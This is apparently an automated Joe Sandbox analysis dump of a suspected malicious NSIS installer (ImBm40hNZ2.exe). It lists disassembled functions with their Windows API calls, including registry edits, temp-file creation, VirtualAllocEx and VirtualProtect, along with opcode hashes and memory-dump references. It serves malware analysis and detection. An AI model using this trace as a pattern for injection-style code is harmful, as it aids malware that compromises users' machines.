                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 004030CF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 4115351271-2414109610
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401B80
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                                                                                                                                                • Opcode ID: bc367c68fc988450a7838e96f05bf1e26fe43bbd001d03be4b8de090aadb1637
                                                                                                                                                                                                                                                                • Instruction ID: 9717a96cc82752b9745dda345e5f929d8d53b2d10d66f9bc57db5fd7b1196717
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc367c68fc988450a7838e96f05bf1e26fe43bbd001d03be4b8de090aadb1637
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221A172A04211ABD710ABA48A8995E73B8EB44714714857BF501B32D1D7BCF8109B1E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00405CBD,00000000,00000002,?,00000002,?,?,00405CBD,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405AA1
                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CBD,?,00405CBD), ref: 00405AC2
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00405AE3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                                                                                                                                                • Instruction ID: 243cde366d026c4bbee3ae285cd60e09c1ede4c2eb0dd04642378b8e862c63c5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01487114020AEFDB128F65EC84AEB3FACEF14354F004126F905A6220D235D964CFB5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                                                                                                                                                                                                                                                • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040247B
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 167947723-0
                                                                                                                                                                                                                                                                • Opcode ID: 44a302db6482d8f83742b1e3beb1e5c4981743e928843549fc1dace8f48bd082
                                                                                                                                                                                                                                                                • Instruction ID: 1e99a264a9944b222e34705325ef89c31e77f1871a72d34f0e2539f6998fac94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44a302db6482d8f83742b1e3beb1e5c4981743e928843549fc1dace8f48bd082
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BF0D172A04200EFE7119F659E8CEBF7A6CEB40348F10443EF441B62C0D6B85E41966A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(00000000), ref: 100028BF
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 100029C6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocErrorLastVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 497505419-0
                                                                                                                                                                                                                                                                • Opcode ID: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                                                                                                                                                                                                                                • Instruction ID: e4aa2bd3e495effe50d9526cbc68d205f519acfcad6f3d50ccedb804016fbdef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D5162BA908215DFFB10DFA4DCC675937B4EB443D5F21842AEA08E722DDF34A9808B54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004056C8
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(0042AC28,00000000,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 00405762
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(0042AC28,0042AC28,0042AC28,0042AC28,0042AC28,0042AC28,00000000,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410), ref: 00405772
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                                                                                                • Opcode ID: 7a08b6d27524c8f2bcd59da278bf895b6231aaf852311aef13317f2d9cf00f04
                                                                                                                                                                                                                                                                • Instruction ID: c39a0513cc250adc57ff8c1e2cc51b7a242abbfcd93ee858ef65dfb317296277
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a08b6d27524c8f2bcd59da278bf895b6231aaf852311aef13317f2d9cf00f04
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E0CD72B04110DBD710B7B45D4A55E3364DF10359B104437F501F11C1D6B85C40466D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00405826
                                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                • Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                                                                                                                                                                                                                • Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2111968516-0
                                                                                                                                                                                                                                                                • Opcode ID: 1b95fb6c5de9dceb638ab3b51104b016d9e3be4dca251902a50dd6d9bc821a7d
                                                                                                                                                                                                                                                                • Instruction ID: d6d0aa84f8b0bb501b14b1d69fea20307f251e2ebcbe8d2f2d3121e022689ca8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b95fb6c5de9dceb638ab3b51104b016d9e3be4dca251902a50dd6d9bc821a7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5212B70D04299BECF229F648E581EEBBB09B05304F64407BE491B63C5D1BC9A81C72D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 327478801-0
                                                                                                                                                                                                                                                                • Opcode ID: 6eab7794b4dfe1c36aa75abedecda1bfdf01b9c3e21da1313a7bc0f9937e8967
                                                                                                                                                                                                                                                                • Instruction ID: 5c6e64fcefe0017d27201ba2f5e1bf0226efa958ba722e95579819ed560bd135
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eab7794b4dfe1c36aa75abedecda1bfdf01b9c3e21da1313a7bc0f9937e8967
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9E04F76A00120BBDB01B7A59E4ADBF7768DB20319B14853BF501F10C1C7BC5C019A2E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PathSearch
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2203818243-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403094,00000000,00000000,00402EB2,000000FF,00000004,00000000,00000000,00000000), ref: 004058AE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002742
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF0,?), ref: 004030A5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404811
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 0040481C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404866
                                                                                                                                                                                                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404879
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000FC,00404DF0), ref: 00404892
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048A6
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048B8
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004048CE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048DA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048EC
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004048EF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040491A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404926
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049BB
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,?,00000000), ref: 004049E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049FA
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404A29
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A37
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404A48
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B45
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BAA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BBF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BE3
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C03
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404C18
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404C28
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404D4A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D59
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D79
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404DC7
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404DD2
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404DD9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $M$N$XRS
                                                                                                                                                                                                                                                                • API String ID: 1638840714-1895184361
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040501A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405029
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405066
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040506E
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040508F
